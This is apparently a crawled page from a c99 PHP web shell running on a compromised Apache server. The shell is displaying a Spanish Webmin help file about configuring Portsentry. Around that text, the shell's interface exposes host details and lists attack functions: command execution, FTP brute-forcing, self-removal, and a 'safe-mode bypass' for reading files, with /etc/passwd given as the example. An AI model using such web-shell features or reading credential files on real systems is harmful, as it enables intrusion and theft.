!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/sentry/help/   drwxr-xr-x
Free 50.87 GB of 127.8 GB (39.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     portsentry.es.html (2.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Configuración de Portsentry
Portsentry es un programa diseñado para detectar y responder en tiempo real a los escaneos de puertos contra una máquina. Puede hacerlo de dos maneras - escuchando en un conjunto de puertos seleccionados (modo básico), o monitorizando todos los puertos por debajo de uno dado. Cuando se detecta una conexión a uno de los puertos monitorizados, Portsentry registra el evento en los historiales y (opcionalmente) ejecuta una acción para bloquear en el futuro cualquier tráfico desde la máquina atacante.

Las opciones de esta página soLas opciones de esta página son :

  • Puertos TCP que monitorizar
    En modo básico, Portsentry escuchará en todos los puertos TCP listados en la primera línea de esta opción. En modo avanzado, escuchará en todos los puertos por debajo del indicado en la segunda línea, excluyendo aquellos listados en el campo 'excepto'.

  • UDP ports to monitor
    Like the TCP ports option, but controls which UDP ports are monitored.

  • Bloquear los sondeos TCP
    Esta opción controla qué acción llevará a cabo Portsentry cuando detecte una conexión TCP a uno de los puertos monitorizados. Las opciones son 'Sí' (bloquear las futuras conexiones desde la máquina), 'No' (no hacer nada), o 'Ejecutar comando asesino' (ejecutar un comando especificado en el fichero de configuración). En todos los casos la conexión se registrará en los históricos del sistema.

  • Bloquear sondeos UDP
    Como la opción de bloquear los sondeos TCP, pero controla qué sucede cuando se detecta una "conexión" UDP.

  • Mensaje para las conexiones bloqueadas
    Cuando Portsentry está escuchando en un puerto, cualquier conexión que se establezca será respondida con este mensaje antes de cerrar la conexión.

  • Número de conexiones antes de activar el bloqueo
    El número de conexiones 'de gracia' que una máquina tiene permitido hacer a un puerto monitorizado antes de ser bloqueada. Si se pone a cero, la primera conexión activará el bloqueo de la máquina.

  • Máquinas cuyo tráfico ignorar
    Las direcciones IP, nombres de máquina, o dirección/máscara de las máquinas y redes cuyo tráfico ignorar.

En la parte inferior de la página hay un botón para iniciar Portsentry (de no estar ejecutando) o pararlo (si está en ejecución). Puesto que Portsentry ejecuta un par de procesos en segundo plano (demonios), si no está ejecutando no se hará ninguna monitorización de escaneos de puertos.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0123 ]--